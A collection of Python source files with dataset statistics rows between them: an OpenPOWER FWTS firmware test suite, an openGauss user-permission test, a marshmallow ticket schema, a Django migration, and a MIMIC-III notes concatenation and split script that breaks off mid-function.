def runTest(self):
self.assertEqual(self.FAIL, None, str(self.FAIL))
class FWTSVersion(unittest.TestCase):
MAJOR = None
MINOR = None
def version_check(self):
if self.MAJOR is None and self.MINOR is None:
self.skipTest("Test not meant to be run this way.")
return (self.MAJOR == 17 and self.MINOR >=1) or self.MAJOR > 17
def runTest(self):
self.assertTrue(self.version_check(),
'FWTS must be at least Version 17.01'
)
class FWTSTest(unittest.TestCase):
SUBTEST_RESULT = None
CENTAURS_PRESENT = True
IS_FSP_SYSTEM = False
FWTS_MAJOR_VERSION = None
FWTS_MINOR_VERSION = None
def runTest(self):
if self.SUBTEST_RESULT is None:
self.skipTest("Test not meant to be run this way.")
if self.SUBTEST_RESULT.get('log_text') == 'dtc reports warnings from device tree:Warning (reg_format): "reg" property in /ibm,opal/flash@0 has invalid length (8 bytes) (#address-cells == 0, #size-cells == 0)\n':
self.skipTest('/ibm,opal/flash@0 known warning')
# Some FWTS verions barfed (incorrectly) on missing nodes
# in the device tree. If we spot this, skip the test
# this work-around should be removed when the FWTS version readily
# available from the archives no longer has this problem
if not (self.SUBTEST_RESULT.get('failure_label') == 'None'):
log_text = self.SUBTEST_RESULT.get('log_text')
if re.match('Property of "(status|manufacturer-id|part-number|serial-number)" for "/sys/firmware/devicetree/base/memory-buffer' , log_text):
self.skipTest("FWTS bug: Incorrect Missing '(status|manufacturer-id|part-number|serial-number)' property in memory-buffer/dimm");
if re.match('property "serial-number" contains unprintable characters', log_text):
self.skipTest("FWTS bug: DIMM VPD has binary serial number")
if self.FWTS_MAJOR_VERSION <= 18:
# This is a guess based on when
# https://lists.ubuntu.com/archives/fwts-devel/2018-April/010318.html
# will be merged
if self.FWTS_MAJOR_VERSION < 18 or self.FWTS_MINOR_VERSION < 5:
if re.match('CPUFreqClaimedMax', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("Bug in FWTS r.e. boost frequencies, fixed sometime after April 2018")
# On FSP machines, memory-buffers (centaurs) aren't present in DT
# and FWTS 17.03 (at least) expects them to be, so skip those failures
if not self.CENTAURS_PRESENT and re.match('No MEM devices \(memory-buffer', log_text):
self.skipTest("FWTS assumes Centaurs present on FSP systems")
if self.IS_FSP_SYSTEM and re.match('Property of "(board-info|part-number|serial-number|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom@.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices', log_text):
self.skipTest("FWTS assumes some nodes present on FSP systems which aren't")
if re.match('Attempt was made to stop the opal-prd.service but was not successful', log_text):
self.skipTest("FWTS bug: prd did actually stop, and there's something strange with FWTS")
if re.match('OPAL "/ibm,firmware-versions" firmware version from device tree node "open-power" was not found', log_text):
self.skipTest("FWTS known issue: 'open-power' version no longer required")
# We currently guess that all these are going to be merged for FWTS 18.05 :)
# To be extra cautious, allowing them to fail for all of 18.XX though
if self.FWTS_MAJOR_VERSION <= 18:
if re.match('CPUPstateLimitsTestFail', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010315.html")
if re.match('DeviceTreeBaseDTCWarnings', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010326.html")
if re.match('Property of "(board-info|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices.', log_text):
self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010329.html")
if re.match('No MEM DIMM devices \(memory-buffer\) were found in "/sys/firmware/devicetree/base" with a status of "okay" or "ok". This is unexpected so please check your system setup for issues.', log_text):
self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010330.html")
self.assertEqual(self.SUBTEST_RESULT.get('failure_label'), 'None', self.SUBTEST_RESULT)
class FWTS(unittest.TestSuite):
def add_fwts_results(self, major_version, minor_version):
host = self.cv_HOST
try:
fwtsjson = host.host_run_command('fwts -q -r stdout --log-type=json')
except CommandFailed as cf:
# FWTS will have exit code of 1 if any test fails,
# we want to ignore that and parse the output.
fwtsjson = cf.output
if cf.exitcode not in [0, 1]:
command_failed = FWTSCommandFailed()
command_failed.FAIL = cf
self.real_fwts_suite.addTest(command_failed)
r = json.loads('\n'.join(fwtsjson), encoding='latin-1')
tests = []
for fwts in r['fwts']:
for k in fwts:
if k == "tests":
tests = fwts[k]
for test_container in tests:
for tr in test_container:
js_suite = test_container[tr][0]
js_subtests = test_container[tr][1]
suite = unittest.TestSuite()
for sts in js_subtests:
if sts == "subtests":
for subtest in js_subtests[sts]:
for st_info in subtest['subtest']:
if not st_info.get('subtest_results'):
continue
for st_result in st_info.get('subtest_results'):
t = FWTSTest()
t.SUBTEST_RESULT = st_result
t.CENTAURS_PRESENT = self.centaurs_present
t.FWTS_MAJOR_VERSION = major_version
t.FWTS_MINOR_VERSION = minor_version
if self.bmc_type == 'FSP':
t.IS_FSP_SYSTEM = True
suite.addTest(t)
self.real_fwts_suite.addTest(suite)
def run(self, result):
conf = OpTestConfiguration.conf
self.cv_HOST = conf.host()
self.cv_SYSTEM = conf.system()
self.bmc_type = conf.args.bmc_type
self.real_fwts_suite = unittest.TestSuite()
try:
self.cv_SYSTEM.goto_state(OpSystemState.OS)
except Exception as e:
# In the event of something going wrong during IPL,
# We need to catch that here as we're abusing UnitTest
# TestSuite infra and we don't have the catch-all that
# a TestCase provides.
f = FWTSCommandFailed()
f.FAIL = e
self.real_fwts_suite.addTest(f)
self.real_fwts_suite.run(result)
return
self.centaurs_present = self.cv_SYSTEM.has_centaurs_in_dt()
host = self.cv_HOST
fwts_version = None
try:
fwts_version = host.host_run_command('fwts --version')
except CommandFailed as cf:
command_failed = FWTSCommandFailed()
command_failed.FAIL = cf
self.real_fwts_suite.addTest(command_failed)
if fwts_version:
# We want to ensure we're at least at version 17.01
# which means we need to parse this:
# fwts, Version V17.01.00, 2017-01-19 04:20:38
v = re.search("fwts, Version V(\d+)\.(\d+)", ''.join(fwts_version))
major , minor = v.group(1) , v.group(2)
checkver = FWTSVersion()
checkver.MAJOR = major
checkver.MINOR = minor
self.real_fwts_suite.addTest(checkver)
if checkver.version_check():
self.add_fwts_results(int(major),int(minor))
self.real_fwts_suite.run(result)
| 49.617647 | 330 | 0.625766 |
import time
import subprocess
import re
import sys
import os
import OpTestConfiguration
import unittest
from common.OpTestSystem import OpSystemState
from common.Exceptions import CommandFailed
import json
class FWTSCommandFailed(unittest.TestCase):
FAIL = None
def runTest(self):
self.assertEqual(self.FAIL, None, str(self.FAIL))
class FWTSVersion(unittest.TestCase):
MAJOR = None
MINOR = None
def version_check(self):
if self.MAJOR is None and self.MINOR is None:
self.skipTest("Test not meant to be run this way.")
return (self.MAJOR == 17 and self.MINOR >=1) or self.MAJOR > 17
def runTest(self):
self.assertTrue(self.version_check(),
'FWTS must be at least Version 17.01'
)
class FWTSTest(unittest.TestCase):
SUBTEST_RESULT = None
CENTAURS_PRESENT = True
IS_FSP_SYSTEM = False
FWTS_MAJOR_VERSION = None
FWTS_MINOR_VERSION = None
def runTest(self):
if self.SUBTEST_RESULT is None:
self.skipTest("Test not meant to be run this way.")
if self.SUBTEST_RESULT.get('log_text') == 'dtc reports warnings from device tree:Warning (reg_format): "reg" property in /ibm,opal/flash@0 has invalid length (8 bytes) (#address-cells == 0, #size-cells == 0)\n':
self.skipTest('/ibm,opal/flash@0 known warning')
if not (self.SUBTEST_RESULT.get('failure_label') == 'None'):
log_text = self.SUBTEST_RESULT.get('log_text')
if re.match('Property of "(status|manufacturer-id|part-number|serial-number)" for "/sys/firmware/devicetree/base/memory-buffer' , log_text):
self.skipTest("FWTS bug: Incorrect Missing '(status|manufacturer-id|part-number|serial-number)' property in memory-buffer/dimm");
if re.match('property "serial-number" contains unprintable characters', log_text):
self.skipTest("FWTS bug: DIMM VPD has binary serial number")
if self.FWTS_MAJOR_VERSION <= 18:
# This is a guess based on when
# https://lists.ubuntu.com/archives/fwts-devel/2018-April/010318.html
# will be merged
if self.FWTS_MAJOR_VERSION < 18 or self.FWTS_MINOR_VERSION < 5:
if re.match('CPUFreqClaimedMax', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("Bug in FWTS r.e. boost frequencies, fixed sometime after April 2018")
# On FSP machines, memory-buffers (centaurs) aren't present in DT
# and FWTS 17.03 (at least) expects them to be, so skip those failures
if not self.CENTAURS_PRESENT and re.match('No MEM devices \(memory-buffer', log_text):
self.skipTest("FWTS assumes Centaurs present on FSP systems")
if self.IS_FSP_SYSTEM and re.match('Property of "(board-info|part-number|serial-number|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom@.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices', log_text):
self.skipTest("FWTS assumes some nodes present on FSP systems which aren't")
if re.match('Attempt was made to stop the opal-prd.service but was not successful', log_text):
self.skipTest("FWTS bug: prd did actually stop, and there's something strange with FWTS")
if re.match('OPAL "/ibm,firmware-versions" firmware version from device tree node "open-power" was not found', log_text):
self.skipTest("FWTS known issue: 'open-power' version no longer required")
# We currently guess that all these are going to be merged for FWTS 18.05 :)
# To be extra cautious, allowing them to fail for all of 18.XX though
if self.FWTS_MAJOR_VERSION <= 18:
if re.match('CPUPstateLimitsTestFail', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010315.html")
if re.match('DeviceTreeBaseDTCWarnings', self.SUBTEST_RESULT.get('failure_label')):
self.skipTest("FWTS known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010326.html")
if re.match('Property of "(board-info|vendor|ibm,slot-location-code)" for "/sys/firmware/devicetree/base/xscom.*" was not able to be retrieved. Check the installation for the CPU device config for missing nodes in the device tree if you expect CPU devices.', log_text):
self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010329.html")
if re.match('No MEM DIMM devices \(memory-buffer\) were found in "/sys/firmware/devicetree/base" with a status of "okay" or "ok". This is unexpected so please check your system setup for issues.', log_text):
self.skipTest("FWTS/firmware known issue: https://lists.ubuntu.com/archives/fwts-devel/2018-April/010330.html")
self.assertEqual(self.SUBTEST_RESULT.get('failure_label'), 'None', self.SUBTEST_RESULT)
class FWTS(unittest.TestSuite):
def add_fwts_results(self, major_version, minor_version):
host = self.cv_HOST
try:
fwtsjson = host.host_run_command('fwts -q -r stdout --log-type=json')
except CommandFailed as cf:
# FWTS will have exit code of 1 if any test fails,
# we want to ignore that and parse the output.
fwtsjson = cf.output
if cf.exitcode not in [0, 1]:
command_failed = FWTSCommandFailed()
command_failed.FAIL = cf
self.real_fwts_suite.addTest(command_failed)
r = json.loads('\n'.join(fwtsjson), encoding='latin-1')
tests = []
for fwts in r['fwts']:
for k in fwts:
if k == "tests":
tests = fwts[k]
for test_container in tests:
for tr in test_container:
js_suite = test_container[tr][0]
js_subtests = test_container[tr][1]
suite = unittest.TestSuite()
for sts in js_subtests:
if sts == "subtests":
for subtest in js_subtests[sts]:
for st_info in subtest['subtest']:
if not st_info.get('subtest_results'):
continue
for st_result in st_info.get('subtest_results'):
t = FWTSTest()
t.SUBTEST_RESULT = st_result
t.CENTAURS_PRESENT = self.centaurs_present
t.FWTS_MAJOR_VERSION = major_version
t.FWTS_MINOR_VERSION = minor_version
if self.bmc_type == 'FSP':
t.IS_FSP_SYSTEM = True
suite.addTest(t)
self.real_fwts_suite.addTest(suite)
def run(self, result):
conf = OpTestConfiguration.conf
self.cv_HOST = conf.host()
self.cv_SYSTEM = conf.system()
self.bmc_type = conf.args.bmc_type
self.real_fwts_suite = unittest.TestSuite()
try:
self.cv_SYSTEM.goto_state(OpSystemState.OS)
except Exception as e:
# In the event of something going wrong during IPL,
# We need to catch that here as we're abusing UnitTest
# TestSuite infra and we don't have the catch-all that
# a TestCase provides.
f = FWTSCommandFailed()
f.FAIL = e
self.real_fwts_suite.addTest(f)
self.real_fwts_suite.run(result)
return
self.centaurs_present = self.cv_SYSTEM.has_centaurs_in_dt()
host = self.cv_HOST
fwts_version = None
try:
fwts_version = host.host_run_command('fwts --version')
except CommandFailed as cf:
command_failed = FWTSCommandFailed()
command_failed.FAIL = cf
self.real_fwts_suite.addTest(command_failed)
if fwts_version:
# We want to ensure we're at least at version 17.01
# which means we need to parse this:
# fwts, Version V17.01.00, 2017-01-19 04:20:38
v = re.search("fwts, Version V(\d+)\.(\d+)", ''.join(fwts_version))
major , minor = v.group(1) , v.group(2)
checkver = FWTSVersion()
checkver.MAJOR = major
checkver.MINOR = minor
self.real_fwts_suite.addTest(checkver)
if checkver.version_check():
self.add_fwts_results(int(major),int(minor))
self.real_fwts_suite.run(result)
| false | true |
79012013f89f59e7c39e1a1aace848e091a2dc28 | 2,838 | py | Python | openGaussBase/testcase/SECURITY/PERMISSIONS/Opengauss_Function_Security_User_Case0010.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SECURITY/PERMISSIONS/Opengauss_Function_Security_User_Case0010.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | openGaussBase/testcase/SECURITY/PERMISSIONS/Opengauss_Function_Security_User_Case0010.py | opengauss-mirror/Yat | aef107a8304b94e5d99b4f1f36eb46755eb8919e | [
"MulanPSL-1.0"
] | null | null | null | """
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : security-user
Case Name : 监控管理员用户可以进行DDL操作
Description :
1.创建监控管理员用户
CREEATE USER monadmin WITH MONADMIN PASSWORD '******'
2.监控管理员用户登录,执行DDL语句
CREATE TABLE table001(id INT);
INSERT INTO table001 VALUES(3);
DROP TABLE table001;
Expect :
1.CREATE ROLE
2.CREATE TABLE
INSERT 0 1
DROP TABLE
History :
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Logger import Logger
from testcase.utils.Common import Common
class Privategrant(unittest.TestCase):
def setUp(self):
self.logger = Logger()
self.logger.info(
'------Opengauss_Function_Security_User_Case0010 start-----')
self.userNode = Node('PrimaryDbUser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.sh_primy = CommonSH('PrimaryDbUser')
self.common = Common()
def test_default_permission(self):
self.logger.info('---------创建MONADMIN用户-------------')
sql_cmd1 = f'CREATE USER monadmin WITH MONADMIN PASSWORD ' \
f'\'{macro.COMMON_PASSWD}\';'
msg1 = self.sh_primy.execut_db_sql(sql_cmd1)
self.assertTrue(msg1.find('CREATE ROLE') > -1)
self.logger.info('---------MONADMIN用户执行DDL语句------------')
sql_cmd2 = 'CREATE TABLE table001(id INT);' \
'INSERT INTO table001 VALUES(3);' \
'DROP TABLE table001;'
excute_cmd2 = f'source {self.DB_ENV_PATH};' \
f'gsql -d {self.userNode.db_name} -p ' \
f'{self.userNode.db_port} -U monadmin -W ' \
f'{macro.COMMON_PASSWD} -c "{sql_cmd2}"'
self.logger.info(excute_cmd2)
msg2 = self.userNode.sh(excute_cmd2).result()
self.logger.info(msg2)
self.common.equal_sql_mdg(msg2, 'CREATE TABLE', 'INSERT 0 1',
'DROP TABLE')
def tearDown(self):
self.logger.info('---------清理环境-----------')
sql_cmd1 = f'drop user monadmin;'
msg1 = self.sh_primy.execut_db_sql(sql_cmd1)
self.logger.info(msg1)
self.assertTrue(msg1.find('DROP ROLE') > -1)
self.logger.info(
'----Opengauss_Function_Security_User_Case0010 finish----')
| 36.384615 | 84 | 0.627555 | import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Logger import Logger
from testcase.utils.Common import Common
class Privategrant(unittest.TestCase):
def setUp(self):
self.logger = Logger()
self.logger.info(
'------Opengauss_Function_Security_User_Case0010 start-----')
self.userNode = Node('PrimaryDbUser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.sh_primy = CommonSH('PrimaryDbUser')
self.common = Common()
def test_default_permission(self):
self.logger.info('---------创建MONADMIN用户-------------')
sql_cmd1 = f'CREATE USER monadmin WITH MONADMIN PASSWORD ' \
f'\'{macro.COMMON_PASSWD}\';'
msg1 = self.sh_primy.execut_db_sql(sql_cmd1)
self.assertTrue(msg1.find('CREATE ROLE') > -1)
self.logger.info('---------MONADMIN用户执行DDL语句------------')
sql_cmd2 = 'CREATE TABLE table001(id INT);' \
'INSERT INTO table001 VALUES(3);' \
'DROP TABLE table001;'
excute_cmd2 = f'source {self.DB_ENV_PATH};' \
f'gsql -d {self.userNode.db_name} -p ' \
f'{self.userNode.db_port} -U monadmin -W ' \
f'{macro.COMMON_PASSWD} -c "{sql_cmd2}"'
self.logger.info(excute_cmd2)
msg2 = self.userNode.sh(excute_cmd2).result()
self.logger.info(msg2)
self.common.equal_sql_mdg(msg2, 'CREATE TABLE', 'INSERT 0 1',
'DROP TABLE')
def tearDown(self):
self.logger.info('---------清理环境-----------')
sql_cmd1 = f'drop user monadmin;'
msg1 = self.sh_primy.execut_db_sql(sql_cmd1)
self.logger.info(msg1)
self.assertTrue(msg1.find('DROP ROLE') > -1)
self.logger.info(
'----Opengauss_Function_Security_User_Case0010 finish----')
| true | true |
79012027ec44685127fd95d1f66b85fa2b2fe231 | 1,053 | py | Python | ticketbyrd/schema.py | barrachri/ticketbyrd | 568d1a501d1c458d33ff9cacaae4c12e7decb4dd | [
"Apache-2.0"
] | null | null | null | ticketbyrd/schema.py | barrachri/ticketbyrd | 568d1a501d1c458d33ff9cacaae4c12e7decb4dd | [
"Apache-2.0"
] | 1 | 2017-12-01T11:02:29.000Z | 2017-12-01T11:02:29.000Z | ticketbyrd/schema.py | barrachri/ticketbyrd | 568d1a501d1c458d33ff9cacaae4c12e7decb4dd | [
"Apache-2.0"
] | null | null | null | from marshmallow import Schema, fields
from marshmallow.validate import OneOf
ticket_type = ("Bug", "Report", "Feature", "Request", "Other")
ticket_urgency = ("Low", "Mid", "High")
ticket_status = ("Open", "In Progress", "Completed", "Rejected")
class Ticket(Schema):
id = fields.Int(dump_only=True)
created_at = fields.DateTime(dump_only=True)
name = fields.Str(required=True)
email = fields.Email(required=True)
subject = fields.Str(required=True)
created_at = fields.DateTime(dump_only=True)
message = fields.Str(required=True)
type = fields.Str(required=True, validate=OneOf(ticket_type))
urgency = fields.Str(required=True, validate=OneOf(ticket_urgency))
status = fields.Str(
missing="Open", required=True, validate=OneOf(ticket_status)
)
class Comment(Schema):
id = fields.Int(dump_only=True)
message = fields.Str(required=True)
created_at = fields.DateTime(dump_only=True)
class User(Schema):
email = fields.Str(required=True)
password = fields.Str(required=True)
| 33.967742 | 71 | 0.705603 | from marshmallow import Schema, fields
from marshmallow.validate import OneOf
ticket_type = ("Bug", "Report", "Feature", "Request", "Other")
ticket_urgency = ("Low", "Mid", "High")
ticket_status = ("Open", "In Progress", "Completed", "Rejected")
class Ticket(Schema):
id = fields.Int(dump_only=True)
created_at = fields.DateTime(dump_only=True)
name = fields.Str(required=True)
email = fields.Email(required=True)
subject = fields.Str(required=True)
created_at = fields.DateTime(dump_only=True)
message = fields.Str(required=True)
type = fields.Str(required=True, validate=OneOf(ticket_type))
urgency = fields.Str(required=True, validate=OneOf(ticket_urgency))
status = fields.Str(
missing="Open", required=True, validate=OneOf(ticket_status)
)
class Comment(Schema):
id = fields.Int(dump_only=True)
message = fields.Str(required=True)
created_at = fields.DateTime(dump_only=True)
class User(Schema):
email = fields.Str(required=True)
password = fields.Str(required=True)
| true | true |
790120c2bf9860a37f6bc1148ad28ee57adb0362 | 942 | py | Python | plants_api/main_site/migrations/0015_auto_20191109_2046.py | Javen17/plants_api | 08e68aa6a1d350f00879b645bbfdc37b900e9464 | [
"MIT"
] | 2 | 2019-09-29T04:19:32.000Z | 2019-10-27T23:44:21.000Z | plants_api/main_site/migrations/0015_auto_20191109_2046.py | Javen17/plants_api | 08e68aa6a1d350f00879b645bbfdc37b900e9464 | [
"MIT"
] | 12 | 2020-03-28T00:13:21.000Z | 2022-02-10T08:33:33.000Z | plants_api/main_site/migrations/0015_auto_20191109_2046.py | Javen17/plants_api | 08e68aa6a1d350f00879b645bbfdc37b900e9464 | [
"MIT"
] | 1 | 2019-09-28T20:27:45.000Z | 2019-09-28T20:27:45.000Z | # Generated by Django 2.2.5 on 2019-11-10 02:46
from django.db import migrations
import django.db.models.deletion
import smart_selects.db_fields
class Migration(migrations.Migration):
dependencies = [
('main_site', '0014_auto_20191109_2038'),
]
operations = [
migrations.AlterField(
model_name='mushroomspecimen',
name='genus',
field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
),
migrations.AlterField(
model_name='plantspecimen',
name='genus',
field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
),
]
| 36.230769 | 215 | 0.687898 |
from django.db import migrations
import django.db.models.deletion
import smart_selects.db_fields
class Migration(migrations.Migration):
dependencies = [
('main_site', '0014_auto_20191109_2038'),
]
operations = [
migrations.AlterField(
model_name='mushroomspecimen',
name='genus',
field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
),
migrations.AlterField(
model_name='plantspecimen',
name='genus',
field=smart_selects.db_fields.ChainedForeignKey(chained_field='family', chained_model_field='family', default=0, on_delete=django.db.models.deletion.CASCADE, to='main_site.Genus', verbose_name='Género'),
),
]
| true | true |
79012104f95db52a63271c87390d80a9ef333446 | 4,453 | py | Python | dataproc/concat_and_split.py | franzbischoff/caml-mimic | 9ce53f4a5093e09f12ed408480af0804aba7d7ca | [
"MIT"
] | null | null | null | dataproc/concat_and_split.py | franzbischoff/caml-mimic | 9ce53f4a5093e09f12ed408480af0804aba7d7ca | [
"MIT"
] | null | null | null | dataproc/concat_and_split.py | franzbischoff/caml-mimic | 9ce53f4a5093e09f12ed408480af0804aba7d7ca | [
"MIT"
] | null | null | null | """
Concatenate the labels with the notes data and split using the saved splits
"""
import csv
from datetime import datetime
import random
from constants import DATA_DIR
from constants import MIMIC_3_DIR
import pandas as pd
DATETIME_FORMAT = "%Y-%m-%d %H-%M-%S"
def concat_data(labelsfile, notes_file):
"""
INPUTS:
labelsfile: sorted by hadm id, contains one label per line
notes_file: sorted by hadm id, contains one note per line
"""
with open(labelsfile, 'r') as lf:
print("CONCATENATING")
with open(notes_file, 'r') as notesfile:
outfilename = '%s/notes_labeled.csv' % MIMIC_3_DIR
with open(outfilename, 'w') as outfile:
w = csv.writer(outfile)
w.writerow(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS'])
labels_gen = next_labels(lf)
notes_gen = next_notes(notesfile)
for i, (subj_id, text, hadm_id) in enumerate(notes_gen):
if i % 10000 == 0:
print(str(i) + " done")
cur_subj, cur_labels, cur_hadm = next(labels_gen)
if cur_hadm == hadm_id:
w.writerow([subj_id, str(hadm_id), text, ';'.join(cur_labels)])
else:
print("couldn't find matching hadm_id. data is probably not sorted correctly")
break
return outfilename
def split_data(labeledfile, base_name):
print("SPLITTING2")
#create and write headers for train, dev, test
train_name = '%s_train_split.csv' % (base_name)
dev_name = '%s_dev_split.csv' % (base_name)
test_name = '%s_test_split.csv' % (base_name)
train_file = open(train_name, 'w')
dev_file = open(dev_name, 'w')
test_file = open(test_name, 'w')
train_file.write(','.join(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS']) + "\n")
dev_file.write(','.join(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS']) + "\n")
test_file.write(','.join(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS']) + "\n")
hadm_ids = {}
#read in train, dev, test splits
for splt in ['train', 'dev', 'test']:
hadm_ids[splt] = set()
with open('%s/%s_full_hadm_ids.csv' % (MIMIC_3_DIR, splt), 'r') as f:
for line in f:
hadm_ids[splt].add(line.rstrip())
with open(labeledfile, 'r') as lf:
reader = csv.reader(lf)
next(reader)
i = 0
cur_hadm = 0
for row in reader:
#filter text, write to file according to train/dev/test split
if i % 10000 == 0:
print(str(i) + " read")
if len(row) > 0: # windows fix
hadm_id = row[1]
if hadm_id in hadm_ids['train']:
train_file.write(','.join(row) + "\n")
elif hadm_id in hadm_ids['dev']:
dev_file.write(','.join(row) + "\n")
elif hadm_id in hadm_ids['test']:
test_file.write(','.join(row) + "\n")
i += 1
train_file.close()
dev_file.close()
test_file.close()
return train_name, dev_name, test_name
def next_labels(labelsfile):
"""
Generator for label sets from the label file
"""
labels_reader = csv.reader(labelsfile)
#header
next(labels_reader)
first_label_line = next(labels_reader)
cur_subj = int(first_label_line[0])
cur_hadm = int(first_label_line[1])
cur_labels = [first_label_line[2]]
for row in labels_reader:
subj_id = int(row[0])
hadm_id = int(row[1])
code = row[2]
#keep reading until you hit a new hadm id
if hadm_id != cur_hadm or subj_id != cur_subj:
yield cur_subj, cur_labels, cur_hadm
cur_labels = [code]
cur_subj = subj_id
cur_hadm = hadm_id
else:
#add to the labels and move on
cur_labels.append(code)
yield cur_subj, cur_labels, cur_hadm
def next_notes(notesfile):
"""
Generator for notes from the notes file
This will also concatenate discharge summaries and their addenda, which have the same subject and hadm id
"""
nr = csv.reader(notesfile)
#header
next(nr)
first_note = next(nr)
cur_subj = int(first_note[0])
cur_hadm = int(first_note[1])
cur_text = first_note[3]
for row in nr:
subj_id = int(row[0])
hadm_id = int(row[1])
text = row[3]
#keep reading until you hit a new hadm id
if hadm_id != cur_hadm or subj_id != cur_subj:
yield cur_subj, cur_text, cur_hadm
cur_text = text
cur_subj = subj_id
cur_hadm = hadm_id
else:
#concatenate to the discharge summary and move on
cur_text += " " + text
yield cur_subj, cur_text, cur_hadm
| 28.544872 | 113 | 0.628116 | import csv
from datetime import datetime
import random
from constants import DATA_DIR
from constants import MIMIC_3_DIR
import pandas as pd
DATETIME_FORMAT = "%Y-%m-%d %H-%M-%S"
def concat_data(labelsfile, notes_file):
with open(labelsfile, 'r') as lf:
print("CONCATENATING")
with open(notes_file, 'r') as notesfile:
outfilename = '%s/notes_labeled.csv' % MIMIC_3_DIR
with open(outfilename, 'w') as outfile:
w = csv.writer(outfile)
w.writerow(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS'])
labels_gen = next_labels(lf)
notes_gen = next_notes(notesfile)
for i, (subj_id, text, hadm_id) in enumerate(notes_gen):
if i % 10000 == 0:
print(str(i) + " done")
cur_subj, cur_labels, cur_hadm = next(labels_gen)
if cur_hadm == hadm_id:
w.writerow([subj_id, str(hadm_id), text, ';'.join(cur_labels)])
else:
print("couldn't find matching hadm_id. data is probably not sorted correctly")
break
return outfilename
def split_data(labeledfile, base_name):
print("SPLITTING2")
#create and write headers for train, dev, test
train_name = '%s_train_split.csv' % (base_name)
dev_name = '%s_dev_split.csv' % (base_name)
test_name = '%s_test_split.csv' % (base_name)
train_file = open(train_name, 'w')
dev_file = open(dev_name, 'w')
test_file = open(test_name, 'w')
train_file.write(','.join(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS']) + "\n")
dev_file.write(','.join(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS']) + "\n")
test_file.write(','.join(['SUBJECT_ID', 'HADM_ID', 'TEXT', 'LABELS']) + "\n")
hadm_ids = {}
#read in train, dev, test splits
for splt in ['train', 'dev', 'test']:
hadm_ids[splt] = set()
with open('%s/%s_full_hadm_ids.csv' % (MIMIC_3_DIR, splt), 'r') as f:
for line in f:
hadm_ids[splt].add(line.rstrip())
with open(labeledfile, 'r') as lf:
reader = csv.reader(lf)
next(reader)
i = 0
cur_hadm = 0
for row in reader:
#filter text, write to file according to train/dev/test split
if i % 10000 == 0:
print(str(i) + " read")
if len(row) > 0: # windows fix
hadm_id = row[1]
if hadm_id in hadm_ids['train']:
train_file.write(','.join(row) + "\n")
elif hadm_id in hadm_ids['dev']:
dev_file.write(','.join(row) + "\n")
elif hadm_id in hadm_ids['test']:
test_file.write(','.join(row) + "\n")
i += 1
train_file.close()
dev_file.close()
test_file.close()
return train_name, dev_name, test_name
def next_labels(labelsfile):
labels_reader = csv.reader(labelsfile)
#header
next(labels_reader)
first_label_line = next(labels_reader)
cur_subj = int(first_label_line[0])
cur_hadm = int(first_label_line[1])
cur_labels = [first_label_line[2]]
for row in labels_reader:
subj_id = int(row[0])
hadm_id = int(row[1])
code = row[2]
#keep reading until you hit a new hadm id
if hadm_id != cur_hadm or subj_id != cur_subj:
yield cur_subj, cur_labels, cur_hadm
cur_labels = [code]
cur_subj = subj_id
cur_hadm = hadm_id
else:
#add to the labels and move on
cur_labels.append(code)
yield cur_subj, cur_labels, cur_hadm
def next_notes(notesfile):
nr = csv.reader(notesfile)
#header
next(nr)
first_note = next(nr)
cur_subj = int(first_note[0])
cur_hadm = int(first_note[1])
cur_text = first_note[3]
for row in nr:
